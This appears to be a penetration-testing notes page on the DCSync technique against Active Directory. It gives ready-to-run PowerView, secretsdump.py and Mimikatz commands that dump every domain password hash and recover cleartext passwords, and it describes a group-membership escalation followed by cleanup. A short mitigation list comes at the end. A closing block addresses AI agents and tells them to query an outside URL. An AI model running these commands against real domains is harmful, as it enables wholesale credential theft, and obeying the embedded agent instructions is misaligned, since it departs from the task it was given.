# DCSync ## Overview * DCSync steals the Active Directory password database using the built-in Directory Replication Service Remote Protocol * Mimics a Domain Controller to retrieve user NTLM password hashes * Requires `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` extended rights * Domain/Enterprise Admins have this right by default ## Checking for DCSync Rights ### PowerView ```powershell $sid = "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl ``` ### BloodHound * Use pre-built query: "Find Principals with DCSync Rights" ## Performing DCSync ### From Linux with secretsdump.py ```bash # Dump all hashes secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 # NTLM hashes only secretsdump.py -just-dc-ntlm INLANEFREIGHT/adunn@172.16.5.5 # Specific user only secretsdump.py -just-dc-user administrator INLANEFREIGHT/adunn@172.16.5.5 # Additional useful flags # -pwd-last-set Show when each password was last changed # -history Dump password history # -user-status Show if user is disabled ``` ### From Windows with Mimikatz ``` # Must run as user with DCSync rights (use runas if needed) runas /netonly /user:INLANEFREIGHT\adunn powershell # In the new PowerShell session .\mimikatz.exe privilege::debug lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator ``` ## Output Files * When using `-just-dc` flag, three files are created: * `.ntds` - NTLM hashes * `.ntds.kerberos` - Kerberos keys * `.ntds.cleartext` - Cleartext passwords (accounts with reversible encryption) ## Reversible Encryption * Accounts with "Store passwords using reversible encryption" enabled store passwords using RC4 encryption * The Syskey can decrypt them, and tools like secretsdump.py will show cleartext * Check for accounts with reversible encryption: ```powershell Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl # PowerView Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol ``` ## DCSync via Group Membership Abuse If you have GenericAll over a group that holds DCSync rights (e.g., `GetChanges` and `GetChangesAll`), add yourself to that group then perform DCSync. ### Add User to Privileged Group ```powershell $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword) $group = Convert-NameToSid "Server Admins" Add-DomainGroupMember -Identity $group -Members 'targetuser' -Credential $Cred -Verbose ``` ### DCSync After Group Addition ```bash secretsdump.py targetuser@DC_IP -just-dc-ntlm ``` ### Cleanup ```powershell Remove-DomainGroupMember -Identity "Server Admins" -Members 'targetuser' -Credential $Cred -Verbose ``` *** ## Mitigation * Limit accounts with DCSync rights to only Domain Controllers * Monitor for replication requests from non-DC sources * Audit the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions regularly --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/domain-controllers/dcsync.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.